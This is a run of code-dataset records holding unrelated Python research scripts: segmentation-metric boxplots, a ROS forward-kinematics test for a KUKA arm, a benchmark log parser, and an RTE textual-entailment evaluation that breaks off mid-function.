mask_rgb[x_index, y_index, :] = color\n # print(mask_rgb[x_index, y_index, :])\n\n color_mask += mask_rgb\n plt.close()\n\n \"\"\"for label, mask in masks.items():\n color = colors[label]\n mask_rgb = np.zeros_like(image)\n mask_rgb[mask != 0] = color\n color_mask += mask_rgb\n return cv2.addWeighted(image, alpha, color_mask, 1 - alpha, 0)\"\"\"\n\n return color_mask.astype(np.float32) # cv2.addWeighted(image, 0.1, color_mask, 0.5, 0)\n\n\ndef compare_boxplots(data, labels, Title):\n # Generate some random indices that we'll use to resample the original data\n # arrays. 
For code brevity, just use the same random indices for each array\n\n fig, ax1 = plt.subplots(figsize=(11, 7))\n fig.canvas.set_window_title('Boxplot Comparison')\n fig.subplots_adjust(left=0.075, right=0.95, top=0.85, bottom=0.25)\n\n bp = ax1.boxplot(data, notch=0, sym='+', vert=1, whis=1.5)\n plt.setp(bp['boxes'], color='black')\n plt.setp(bp['whiskers'], color='black')\n plt.setp(bp['fliers'], color='red', marker='+')\n\n # Add a horizontal grid to the plot, but make it very light in color\n # so we can use it for reading data values but not be distracting\n ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey',\n alpha=0.5)\n\n # Hide these grid behind plot objects\n ax1.set_axisbelow(True)\n # ax1.set_title(Title)\n ax1.set_xlabel('Model')\n ax1.set_ylabel(Title)\n\n # Now fill the boxes with desired colors\n # box_colors = ['darkkhaki', 'royalblue']\n box_colors = ['royalblue', 'royalblue']\n num_boxes = len(data)\n medians = np.empty(num_boxes)\n averages = np.empty(num_boxes)\n for i in range(num_boxes):\n box = bp['boxes'][i]\n boxX = []\n boxY = []\n for j in range(5):\n boxX.append(box.get_xdata()[j])\n boxY.append(box.get_ydata()[j])\n box_coords = np.column_stack([boxX, boxY])\n # Alternate between Dark Khaki and Royal Blue\n ax1.add_patch(Polygon(box_coords, facecolor=box_colors[i % 2]))\n # Now draw the median lines back over what we just filled in\n med = bp['medians'][i]\n medianX = []\n medianY = []\n for j in range(2):\n medianX.append(med.get_xdata()[j])\n medianY.append(med.get_ydata()[j])\n ax1.plot(medianX, medianY, 'k')\n medians[i] = medianY[0]\n averages[i] = np.average(data[i])\n # Finally, overplot the sample averages, with horizontal alignment\n # in the center of each box\n ax1.plot(np.average(med.get_xdata()), np.average(data[i]),\n color='w', marker='*', markeredgecolor='k')\n\n # Set the axes ranges and axes labels\n ax1.set_xlim(0.5, num_boxes + 0.5)\n top = 1.1\n bottom = -0.1\n ax1.set_ylim(bottom, top)\n\n ax1.set_xticklabels(np.repeat(labels, 2), fontsize=15, weight='bold')\n\n # set stars and lines\n y_max = 1.1\n y_min = 0.5\n # ax1.set_ylabel(fontsize=15, weight='bold')\n \"\"\"ax1.annotate(\"\", xy=(1, y_max), \n xycoords='data',\n xytext=(3, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.04\"))\n\n ax1.annotate(\"\", xy=(1, y_max), \n xycoords='data',\n xytext=(5, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.06\"))\n\n ax1.text(1.9, y_max + (y_max - y_min)*0.06, stars(0.01),\n horizontalalignment='center',\n verticalalignment='center', \n size='x-small') \n\n ax1.text(3, y_max + (y_max - y_min)*0.12, stars(0.01),\n horizontalalignment='center',\n verticalalignment='center', \n size='x-small') \n\n ax1.text(4, y_max + (y_max - y_min)*0.24, stars(0.01),\n horizontalalignment='center',\n verticalalignment='center',\n size='x-small') \n\n ax1.annotate(\"\", xy=(2, y_max), \n xycoords='data',\n xytext=(4, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.08\"))\n\n ax1.annotate(\"\", xy=(2, y_max), \n xycoords='data',\n xytext=(6, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.08\"))\n\n ax1.annotate(\"\", xy=(5, y_max), \n xycoords='data',\n xytext=(7, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.04\"))\"\"\"\n\n # 
Due to the Y-axis scale being different across samples, it can be\n    # hard to compare differences in medians across the samples. Add upper\n    # X-axis tick labels with the sample medians to aid in comparison\n    # (just use two decimal places of precision)\n    pos = np.arange(num_boxes) + 1\n    upper_labels = [str(round(s, 2)) for s in medians]\n    weights = ['bold', 'semibold']\n    for tick, label in zip(range(num_boxes), ax1.get_xticklabels()):\n        k = tick % 2\n        ax1.text(pos[tick], 0.95, upper_labels[tick],\n                 transform=ax1.get_xaxis_transform(),\n                 horizontalalignment='center', size='large',\n                 weight=weights[k], color=box_colors[k])\n\n    # Finally, add a basic legend\n\n    fig.text(0.10, 0.1, '---',\n             backgroundcolor=box_colors[1], color='black', weight='roman',\n             size='large')\n\n    fig.text(0.10, 0.045, '--',\n             backgroundcolor=box_colors[1],\n             color='white', weight='roman', size='large')\n\n    \"\"\"fig.text(0.10, 0.1, 'Grayscale dataset',\n             backgroundcolor=box_colors[0], color='black', weight='roman',\n             size='large')\n\n    fig.text(0.10, 0.045, 'Color dataset',\n             backgroundcolor=box_colors[1],\n             color='white', weight='roman', size='large')\"\"\"\n\n    fig.text(0.10, 0.005, '*', color='white', backgroundcolor='silver',\n             weight='roman', size='large')\n\n    fig.text(0.115, 0.003, 'Average Value', color='black', weight='roman',\n             size='large')\n\n    plt.show()\n\n\ndef read_results_csv(file_path, row_id=0):\n    dice_values = []\n    with open(file_path, 'r') as file:\n        reader = csv.reader(file)\n        for row in reader:\n            dice_values.append(float(row[row_id]))\n\n    return dice_values\n\n\ndef read_img_results(dir_image):\n    # cv2.imread expects an IMREAD_* flag; a COLOR_* conversion code was passed here by mistake\n    original_img = cv2.imread(dir_image, cv2.IMREAD_UNCHANGED)\n\n    if original_img is None:\n        print('Could not open or find the image:', dir_image)\n        exit(0)\n\n\ndef main():\n    \"\"\"path_file_1 = '/home/nearlab/Jorge/current_work/lumen_segmentation/data/' \\\n                     'lumen_data/results/' \\\n                     'compare_color_space/maskrcnn/' \\\n                     'results_evaluation_test_02_MaskRCNN_thershold_0.8_grayscale_.csv'\"\"\"\n\n    path_file_1 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n                  'data/polyps/results/test_02/' \\\n                  'results_evaluation__test_02_new.csv'\n\n    path_file_2 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n                  'data/polyps/results/test_01/' \\\n                  'results_evaluation__test_01_new.csv'\n\n    path_file_3 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n                  'data/polyps/results/test_03/' \\\n                  'results_evaluation__test_03_new.csv'\n\n    path_file_4 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n                  'data/polyps/results/test_04/' \\\n                  'results_evaluation__test_04_new.csv'\n\n    path_file_5 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n                  'data/polyps/results/test_05/' \\\n                  'results_evaluation__test_05_new.csv'\n\n    path_file_6 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n                  'data/polyps/results/ensemble_2/' \\\n                  'results_evaluation__ensemble_2_new.csv'\n\n    path_file_7 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n                  'data/polyps/results/test_07/' \\\n                  'results_evaluation__test_07_new.csv'\n\n    path_file_8 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n                  'data/polyps/results/test_08/' \\\n                  'results_evaluation__test_08_new.csv'\n\n    # SAN network\n    # path_file_7 = '/home/jlazo/Desktop/current_work/ICPR2020/data/enlarged_dataset/ensembles'\n    # restore the one below\n\n    # unet bn\n\n    labels = ['ResUnet', 'Mask-RCNN', 'Proposed 1', 'Proposed 2']\n\n    data_experiment_1 = read_results_csv(path_file_1, 2)\n    data_experiment_2 = 
read_results_csv(path_file_2, 2)\n data_experiment_3 = read_results_csv(path_file_3, 2)\n data_experiment_4 = read_results_csv(path_file_4, 2)\n data_experiment_5 = read_results_csv(path_file_5, 2)\n data_experiment_6 = read_results_csv(path_file_6, 2)\n data_experiment_7 = read_results_csv(path_file_7, 2)\n data_experiment_8 = read_results_csv(path_file_8, 2)\n\n data = [data_experiment_1, data_experiment_2,\n data_experiment_3,\n data_experiment_4,\n data_experiment_5,\n data_experiment_6,\n data_experiment_7,\n data_experiment_8]\n\n compare_boxplots(data, labels, 'DSC')\n\n data_experiment_1 = read_results_csv(path_file_1, 3)\n data_experiment_2 = read_results_csv(path_file_2, 3)\n data_experiment_3 = read_results_csv(path_file_3, 3)\n data_experiment_4 = read_results_csv(path_file_4, 3)\n data_experiment_5 = read_results_csv(path_file_5, 3)\n data_experiment_6 = read_results_csv(path_file_6, 3)\n data_experiment_7 = read_results_csv(path_file_7, 3)\n data_experiment_8 = read_results_csv(path_file_8, 3)\n\n data = [data_experiment_1, data_experiment_2,\n data_experiment_3,\n data_experiment_4,\n data_experiment_5,\n data_experiment_6,\n data_experiment_7,\n data_experiment_8]\n\n compare_boxplots(data, labels, 'Prec')\n\n data_experiment_1 = read_results_csv(path_file_1, 4)\n data_experiment_2 = read_results_csv(path_file_2, 4)\n data_experiment_3 = read_results_csv(path_file_3, 4)\n data_experiment_4 = read_results_csv(path_file_4, 4)\n data_experiment_5 = read_results_csv(path_file_5, 4)\n data_experiment_6 = read_results_csv(path_file_6, 4)\n data_experiment_7 = read_results_csv(path_file_7, 4)\n data_experiment_8 = read_results_csv(path_file_8, 4)\n\n data = [data_experiment_1, data_experiment_2,\n data_experiment_3,\n data_experiment_4,\n data_experiment_5,\n data_experiment_6,\n data_experiment_7,\n data_experiment_8]\n\n compare_boxplots(data, labels, 'Rec')\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"general/compare_boxes_plots.py","file_name":"compare_boxes_plots.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
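Note on the record above: the three metric blocks in main() differ only in the CSV column index, so the eight read_results_csv calls per metric can be driven by a loop. A minimal sketch, assuming columns 2, 3 and 4 hold DSC, Prec and Rec as in the calls above; all_paths is a hypothetical list of the eight result-file paths, not a name from the original script:

import csv

def read_metric(file_path, column):
    """Read one float column from a results CSV file."""
    with open(file_path, 'r') as f:
        return [float(row[column]) for row in csv.reader(f)]

def collect_metric(paths, column):
    """Read the same metric column from every results file."""
    return [read_metric(p, column) for p in paths]

# Hypothetical usage, mirroring the three blocks in main():
# for title, col in [('DSC', 2), ('Prec', 3), ('Rec', 4)]:
#     compare_boxplots(collect_metric(all_paths, col), labels, title)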
+{"seq_id":"483116880","text":"#!/usr/bin/env python\n\n# import modules\nimport tf\nimport time\nimport rospy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom my_kuka_robot.srv import *\nfrom trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint\nfrom geometry_msgs.msg import Pose\nfrom sympy import mpmath\nfrom sympy import *\n\ndef debug_log(log):\n\tif (debug_mode):\n\t\tprint(log)\n\tpass\n\ndef rand_in_range(low, high):\n\treturn low + np.random.rand()*(high - low)\n\n# Radians to Degree\ndef rtod(q):\n\treturn q*180.0/np.pi\n\n# Degree to Radians\ndef dtor(q):\n\treturn q*np.pi/180.0\n\nclass FKTest(object):\n\n\tdef __init__(self):\n\t\tdebug_log(\"Step 1: initializing test script...\")\n\t\t# TODO\n\t\trospy.init_node(\"FK_test\")\n\n\t\tdebug_log(\"Step 2: waiting for service to be available.\")\n\t\trospy.wait_for_service('FK_service')\n\t\t# rospy.wait_for_service('IK_service')\n\n\t\tdebug_log(\"Step 3: creating a callable proxy to a service\")\n\t\t# TODO\n\t\tself.FKSolver = rospy.ServiceProxy('FK_service', robot_FK)\n\t\t# self.IK_proxy = rospy.ServiceProxy('IK_service', robo_IK)\n\n\t\tself.FK_REQ = [\tJointTrajectoryPoint(),\n\t\t\tJointTrajectoryPoint(),\n\t\t\tJointTrajectoryPoint()]\n\t\tself.FK_REQ[0].positions = (2.92, 0.01, -2.72, 2.94, 0.49, 3.65)\n\t\tself.FK_REQ[1].positions = (3.21, 1.16, -1.81, -4.04, -1.07, -3.72)\n\t\tself.FK_REQ[2].positions = (1.66, 0.84, -3.33, 1.27, -0.28, 2.96)\n\n\t\tself.FK_RESP = [Pose(),\n\t\t\tPose(),\n\t\t\tPose()]\n\t\tself.FK_RESP[0].position.x = 1.241097506\n\t\tself.FK_RESP[0].position.y = -0.308878104954\n\t\tself.FK_RESP[0].position.z = 2.66139826936\n\t\tself.FK_RESP[1].position.x = -2.94615069338\n\t\tself.FK_RESP[1].position.y = 0.00657260199077\n\t\tself.FK_RESP[1].position.z = 2.07021476465\n\t\tself.FK_RESP[2].position.x = 0.0908570554147\n\t\tself.FK_RESP[2].position.y = -0.118085650178\n\t\tself.FK_RESP[2].position.z = 2.69381803552\t\n\t\tself.FK_RESP[0].orientation.x = 0.973569123941\n\t\tself.FK_RESP[0].orientation.y = -0.159235851633\n\t\tself.FK_RESP[0].orientation.z = 0.00124492841665\n\t\tself.FK_RESP[0].orientation.w = -0.163724019669\n\t\tself.FK_RESP[1].orientation.x = -0.25579584927\n\t\tself.FK_RESP[1].orientation.y = -0.53186509833\n\t\tself.FK_RESP[1].orientation.z = 0.772125532224\n\t\tself.FK_RESP[1].orientation.w = 0.23560594891\n\t\tself.FK_RESP[2].orientation.x = 0.220283358922\n\t\tself.FK_RESP[2].orientation.y = -0.434902191935\n\t\tself.FK_RESP[2].orientation.z = -0.378367271047\n\t\tself.FK_RESP[2].orientation.w = 0.786875805596\n\t\tpass\n\n\tdef generate_FK_request(self):\n\t\ttheta1 = rand_in_range(dtor(-185), dtor(185))\n\t\ttheta2 = rand_in_range(dtor(-45), dtor(85))\n\t\ttheta3 = rand_in_range(dtor(-210), dtor(65))\n\t\ttheta4 = rand_in_range(dtor(-350), dtor(350))\n\t\ttheta5 = rand_in_range(dtor(-125), dtor(125))\n\t\ttheta6 = rand_in_range(dtor(-350), dtor(350))\n\n\t\ttheta_t = (theta1, theta2, theta3, theta4, theta5, theta6)\n\t\treturn theta_t\n\n\tdef run_tests(self):\n\t\terrors = 0\n\t\tdebug_log(\"Step 4: ready for testing.\")\n\t\tdebug_log(\"\\n Part 1: predefined tests\")\n\t\t# TODO: Response: FK_resp // Request: self.FK_REQ\n\t\tFK_resp = self.FKSolver(self.FK_REQ)\t\n\t\terrors += self.verify_result(FK_resp)\n\n\t\tdebug_log(\"\\n Part 2: random tests\")\n\t\tFK_reqs = []\n\t\tfor i in range(5):\n\t\t\tjoint_trajectory_point = JointTrajectoryPoint()\n\t\t\tjoint_trajectory_point.positions = 
self.generate_FK_request()\n\t\t\tFK_reqs.append(joint_trajectory_point)\n\t\t\n\t\tFK_resp = self.FKSolver(FK_reqs)\n\t\tself.show_result(FK_reqs, FK_resp)\n\n\t\tif(errors < 1):\n\t\t\tdebug_log(\"FK test passed!\")\n\t\telse:\n\t\t\tdebug_log(\"FK test failed\")\n\n\tdef show_result(self,FK_reqs, FK_resp):\n\t\tfor x in xrange(0, len(FK_resp.poses)): \n\t\t\tpos_r = FK_resp.poses[x].position\n\t\t\tori_r = FK_resp.poses[x].orientation\n\t\t\tdebug_log(\" FK_request {}: joint angles = {}\".format(x, FK_reqs[x].positions))\n\t\t\tdebug_log(\" FK_response {}: position = {},{},{}\".format(x, pos_r.x, pos_r.y, pos_r.z))\t\n\t\t\tdebug_log(\" FK_response {}: orientation = {},{},{},{}\\n\".format(x, ori_r.x,ori_r.y,ori_r.z,ori_r.w))\n\n\tdef verify_result(self,FK_resp):\n\t\terrors = 0\n\t\tfor x in xrange(0, len(FK_resp.poses)): \n\t\t\tpos_r = FK_resp.poses[x].position\n\t\t\tori_r = FK_resp.poses[x].orientation\n\t\t\tpos_e = self.FK_RESP[x].position\n\t\t\tori_e = self.FK_RESP[x].orientation\n\n\t\t\tpos_r_mat = Matrix([[pos_r.x], [pos_r.y], [pos_r.z]])\n\t\t\tpos_e_mat = Matrix([[pos_e.x], [pos_e.y], [pos_e.z]])\n\t\t\terr = (pos_r_mat - pos_e_mat).norm()\n\n\t\t\tdebug_log(\" received FK_response {}: position = {},{},{}\".format(x, pos_r.x, pos_r.y, pos_r.z))\t\n\t\t\tdebug_log(\" FK_response {}: orientation = {},{},{},{}\".format(x, ori_r.x,ori_r.y,ori_r.z,ori_r.w))\n\t\t\tdebug_log(\" expected FK_response {}: position = {},{},{}\".format(x, pos_e.x, pos_e.y, pos_e.z))\t\n\t\t\tdebug_log(\" FK_response {}: orientation = {},{},{},{}\".format(x, ori_e.x,ori_e.y,ori_e.z,ori_e.w))\n\t\t\tdebug_log(\" error: {}\\n\".format(err))\n\t\t\terrors += err\n\t\treturn errors\n\n\nif __name__ == \"__main__\":\n\n\tglobal debug_mode\n\tdebug_mode = True\n\n\tmy_kuka_FK_test = FKTest()\n\tmy_kuka_FK_test.run_tests()\n\n\trospy.spin()\n","sub_path":"catkin_ws/src/my_kuka_robot/scripts/FK_test.py","file_name":"FK_test.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
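Note on the record above: verify_result scores each pose by the Euclidean distance between the received and expected end-effector positions, built with sympy matrices. A minimal NumPy sketch of the same check, under the assumption that plain float tuples are acceptable; the example values are illustrative:

import numpy as np

def position_error(received, expected):
    """Euclidean norm of the difference between two xyz positions."""
    return float(np.linalg.norm(np.asarray(received) - np.asarray(expected)))

assert position_error((1.0, 2.0, 2.0), (0.0, 0.0, 0.0)) == 3.0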
+{"seq_id":"195905800","text":"import sys\nimport collections\n\nmodels = [('fc_data', 1, 0), \n ('fc_data', 2, 0),\n ('fc_data', 2, 1),\n ('fc_data_slice', 2, 0),\n ('fc_data_slice', 2, 1),\n ('fc_model', 2, 0),\n ('fc_data_ff', 1, 0),\n ('fc_data_ff', 2, 0),\n ('fc_data_ff', 2, 1),\n ('fc_model_ff', 2, 0),\n ('fc_single_manual', 1, 0),\n ('fc_model_manual', 2, 0),\n ('fc_data_manual', 2, 0),\n ]\n\nruntimes = {}\nwith open(sys.argv[1]) as f:\n token = 'Training '\n for line in f:\n index = line.find(token)\n if index == -1:\n continue\n line = line[index + len(token):]\n index = line.find('+')\n model = line[:index]\n line = line[index + 1:]\n index = line.find('+')\n nworkers = int(line[:index])\n line = line[index + 1:]\n index = line.find('+')\n gpu_aggr = int(line[:index])\n line = line[index + 1:]\n index = line.find('+')\n ws = int(line[:index])\n line = line[index + 1:]\n index = line.find(' ')\n bs = int(line[:index])\n line = line[line.find(', ') + 2:]\n runtime = float(line[:line.find(' ')])\n runtimes[(model, nworkers, gpu_aggr, ws, bs)] = runtime\n\n\nwith open(\"__out.csv\", \"w\") as wf:\n for ws in (1024, 2048, 4096, 8192):\n wf.write('%d x %d weights (%dMB)\\n' % (ws, ws, ws * ws / (2 ** 20)))\n for bs in [2 ** i for i in range(1, 14)]:\n wf.write('%d' % bs)\n for model in models:\n key = tuple(list(model) + [ws, bs])\n print(key)\n if key in runtimes:\n wf.write(', %.3f' % runtimes[key])\n else:\n wf.write(', N/A')\n wf.write('\\n')\n","sub_path":"benchmark/parse_mini.py","file_name":"parse_mini.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"301525625","text":"# -*- coding: utf-8 -*-\n\n# Created by junfeng on 4/6/16.\n\n# logging config\nimport logging\n\nfrom gensim.models import Word2Vec\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\nlogger = logging.getLogger('eval_rte_dataset')\n\nfrom datetime import datetime\n\nlogger_filename = './log/eval_rte_dataset-{0}.log'.format(datetime.now())\nimport os.path\n# import os\n# if os.path.isfile(logger_filename):\n# os.remove(logger_filename)\nfile_handler = logging.FileHandler(logger_filename, mode='a')\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfile_handler.setFormatter(formatter)\n\nlogger.addHandler(file_handler)\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.cross_validation import StratifiedKFold, KFold\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import accuracy_score, log_loss\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import pairwise\n\nimport numpy as np\n\nimport skipthoughts\nimport rte_utils\n\n\ndef read_rte_data():\n logger.info('read data ...')\n vectorized_ts, vectorized_hs, labels = joblib.load('./data/processed-rte-dataset.pkl')\n return vectorized_ts, vectorized_hs, labels\n\n\ndef gen_cv():\n vectorized_ts, vectorized_hs, labels = read_rte_data()\n X_all = np.concatenate((vectorized_ts, vectorized_hs), axis=1)\n logger.info('X_all.shape: {0}'.format(X_all.shape))\n logger.info('labels.shape: {0}'.format(labels.shape))\n skf = StratifiedKFold(labels, n_folds=3, shuffle=True, random_state=919)\n return skf, X_all, labels\n\n\ndef run():\n mean_acc = 0.0\n mean_logloss = 0.0\n skf, X_all, labels = gen_cv()\n for fold, (test_index, train_index) in enumerate(skf, start=1):\n logger.info('at fold: {0}'.format(fold))\n logger.info('train samples: {0}, test samples: {1}'.format(len(train_index), len(test_index)))\n X_train, X_test = X_all[train_index], X_all[test_index]\n y_train, y_test = labels[train_index], labels[test_index]\n rfc = RandomForestClassifier(n_jobs=10, random_state=919)\n rfc.fit(X_train, y_train)\n y_test_predicted = rfc.predict(X_test)\n y_test_proba = rfc.predict_proba(X_test)\n # equals = y_test == y_test_predicted\n # acc = np.sum(equals) / float(len(equals))\n acc = accuracy_score(y_test, y_test_predicted)\n logger.info('test data predicted accuracy: {0}'.format(acc))\n # log loss -log P(yt|yp) = -(yt log(yp) + (1 - yt) log(1 - yp))\n logloss = log_loss(y_test, y_test_proba)\n logger.info('log loss at test data: {0}'.format(logloss))\n # logger.info('log loss at test data using label: {0}'.format(log_loss(y_test, y_test_predicted)))\n mean_acc += acc\n mean_logloss += logloss\n\n n_folds = skf.n_folds\n logger.info('mean acc: {0}'.format(mean_acc / n_folds))\n logger.info('mean log loss: {0}'.format(mean_logloss / n_folds))\n\n\ndef get_sentence_sample(pairs):\n sample_length = len(pairs)\n logger.info('sample length: {0}'.format(sample_length))\n ts = []\n hs = []\n labels = np.empty(sample_length, dtype=int)\n samples = []\n for i, pair in enumerate(pairs):\n value = pair.value\n labels[i] = value\n t = pair.text\n h = pair.hyp\n ts.append(t)\n hs.append(h)\n samples.append(u'{0} {1}'.format(t, h))\n if i % 1000 == 0:\n logger.info('processed sample {0}'.format(i))\n logger.info('unique ts: {0}, unique hs: {1}'.format(len(set(ts)), len(set(hs))))\n logger.info('unique sample: 
{0}'.format(len(set(samples))))\n logger.info('TRUE labels: {0}'.format(np.sum(labels)))\n return ts, hs, labels\n\n\ndef read_model():\n model = skipthoughts.load_model()\n return model\n\n\ndef read_rte_from_nltk(model=None, version=3):\n train_saved_path = './data/processed-rte{0}-train.pkl'.format(version)\n test_saved_path = './data/processed-rte{0}-test.pkl'.format(version)\n if os.path.isfile(train_saved_path) and os.path.isfile(test_saved_path):\n X_train, train_labels = joblib.load(train_saved_path)\n X_test, test_labels = joblib.load(test_saved_path)\n return X_train, X_test, train_labels, test_labels\n\n if model is None:\n model = read_model()\n\n from nltk.corpus import rte\n train_xml = 'rte{0}_dev.xml'.format(version)\n test_xml = 'rte{0}_test.xml'.format(version)\n train_pairs = rte.pairs(train_xml)\n test_pairs = rte.pairs(test_xml)\n\n train_ts, train_hs, train_labels = get_sentence_sample(train_pairs)\n logger.info('encoding train samples ...')\n logger.info('encoding ts ...')\n vectorized_train_ts = skipthoughts.encode(model, train_ts)\n logger.info('encoding hs ...')\n vectorized_train_hs = skipthoughts.encode(model, train_hs)\n X_train = np.concatenate((vectorized_train_ts, vectorized_train_hs), axis=1)\n\n test_ts, test_hs, test_labels = get_sentence_sample(test_pairs)\n logger.info('encoding test samples ...')\n logger.info('encoding ts ...')\n vectorized_test_ts = skipthoughts.encode(model, test_ts)\n logger.info('encoding hs ...')\n vectorized_test_hs = skipthoughts.encode(model, test_hs)\n X_test = np.concatenate((vectorized_test_ts, vectorized_test_hs), axis=1)\n\n logger.info('dump to file ...')\n joblib.dump((X_train, train_labels), train_saved_path)\n joblib.dump((X_test, test_labels), test_saved_path)\n logger.info('done')\n\n return X_train, X_test, train_labels, test_labels\n\n\nclass RTE2Cosine(object):\n\n def __init__(self, word2vec_model_file):\n self.model_file = word2vec_model_file\n self.word2vec = None\n\n def calculate_cosine_features(self, rte_data, version=3):\n train_saved_path = './rte_data/cosine-rte{0}-train.pkl'.format(version)\n test_saved_path = './rte_data/cosine-rte{0}-test.pkl'.format(version)\n if os.path.isfile(train_saved_path) and os.path.isfile(test_saved_path):\n train_data = joblib.load(train_saved_path)\n test_data = joblib.load(test_saved_path)\n return train_data, test_data\n\n if self.word2vec is None:\n logger.info('loading pre-trained word2vec model ...')\n self.word2vec = Word2Vec.load_word2vec_format(self.model_file, binary=True)\n\n def handle(df):\n data_cosines = np.empty((len(df), 2))\n for index, row in df.iterrows():\n text = row.text\n hypothesis = row.hypothesis\n text = text.split()\n hypothesis = hypothesis.split()\n sims = np.zeros((len(text), len(hypothesis)))\n for i, w1 in enumerate(text):\n for j, w2 in enumerate(hypothesis):\n if w1 not in self.word2vec or w2 not in self.word2vec:\n sim = 0.0\n else:\n sim = self.word2vec.similarity(w1, w2)\n sims[i, j] = sim\n text_max_cosines = np.max(sims, axis=1)\n text_mean_cosine = np.mean(text_max_cosines)\n hypothesis_max_cosines = np.max(sims, axis=0)\n hypothesis_mean_cosine = np.mean(hypothesis_max_cosines)\n data_cosines[index, 0] = text_mean_cosine\n data_cosines[index, 1] = hypothesis_mean_cosine\n return data_cosines\n\n train_df = rte_data.train_df\n test_df = rte_data.test_df\n train_data = handle(train_df)\n test_data = handle(test_df)\n joblib.dump(train_data, train_saved_path)\n joblib.dump(test_data, test_saved_path)\n return train_data, 
test_data\n\n\ndef logistic_test_using_cosine(score_feature=True):\n logger.info('using cosine features in logistic regression')\n if score_feature:\n logger.info('also use score feature')\n Cs = [2**t for t in range(0, 10, 1)]\n Cs.extend([3**t for t in range(1, 10, 1)])\n rte2cosine = RTE2Cosine('/home/junfeng/word2vec/GoogleNews-vectors-negative300.bin')\n X_train_all = []\n X_test_all = []\n train_labels_all = []\n test_labels_all = []\n for version in range(1, 4):\n logger.info('loading version {0} data ...'.format(version))\n rte_data = rte_utils.read_rte_from_nltk(version=version)\n X_train, X_test = rte2cosine.calculate_cosine_features(rte_data, version)\n\n train_labels = rte_data.train_df.label.values\n test_labels = rte_data.test_df.label.values\n X_train_all.append(X_train)\n X_test_all.append(X_test)\n train_labels_all.append(train_labels)\n test_labels_all.append(test_labels)\n if score_feature:\n y_train_proba, y_test_proba = joblib.load('./rte_data/logistic_score_rte{0}.pkl'.format(version))\n X_train = np.concatenate([X_train, y_train_proba.reshape((-1, 1))], axis=1)\n X_test = np.concatenate([X_test, y_test_proba.reshape((-1, 1))], axis=1)\n logger.info('X_train.shape: {0}'.format(X_train.shape))\n logger.info('X_test.shape: {0}'.format(X_test.shape))\n\n logreg = LogisticRegressionCV(Cs=Cs, cv=3, n_jobs=10, random_state=919)\n logreg.fit(X_train, train_labels)\n logger.info('best C is {0}'.format(logreg.C_))\n y_test_predicted = logreg.predict(X_test)\n acc = accuracy_score(test_labels, y_test_predicted)\n logger.info('evaluate at RTE {0} dataset'.format(version))\n logger.info('test data predicted accuracy: {0}'.format(acc))\n\n X_train_all = np.concatenate(X_train_all)\n X_test_all = np.concatenate(X_test_all)\n if score_feature:\n y_train_all_proba, y_test_all_proba = joblib.load('./rte_data/logistic_score_rte_all.pkl')\n X_train_all = np.concatenate([X_train_all, y_train_all_proba.reshape((-1, 1))], axis=1)\n X_test_all = np.concatenate([X_test_all, y_test_all_proba.reshape((-1, 1))], axis=1)\n train_labels_all = np.concatenate(train_labels_all)\n test_labels_all = np.concatenate(test_labels_all)\n logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n\n logreg = LogisticRegressionCV(Cs=Cs, cv=3, n_jobs=10, random_state=919, verbose=1)\n logreg.fit(X_train_all, train_labels_all)\n logger.info('best C is {0}'.format(logreg.C_))\n y_test_all_predicted = logreg.predict(X_test_all)\n acc = accuracy_score(test_labels_all, y_test_all_predicted)\n logger.info('evaluate at RTE combined dataset')\n logger.info('test data predicted accuracy: {0}'.format(acc))\n\n\ndef logistic_test(cosine_feature=True):\n logger.info('using logistic regression')\n if cosine_feature:\n logger.info('also use cosine feature')\n logger.info('read model ...')\n n_components = None\n Cs = [2**t for t in range(0, 10, 1)]\n Cs.extend([3**t for t in range(1, 10, 1)])\n # model = read_model()\n model = None\n rte2cosine = RTE2Cosine('/home/junfeng/word2vec/GoogleNews-vectors-negative300.bin')\n X_train_all = []\n X_test_all = []\n train_labels_all = []\n test_labels_all = []\n for version in range(1, 4):\n logger.info('loading version {0} data ...'.format(version))\n train_cosine, test_cosine = None, None\n if cosine_feature:\n rte_data = rte_utils.read_rte_from_nltk(version=version)\n train_cosine, test_cosine = rte2cosine.calculate_cosine_features(rte_data, version)\n X_train, X_test, train_labels, test_labels = 
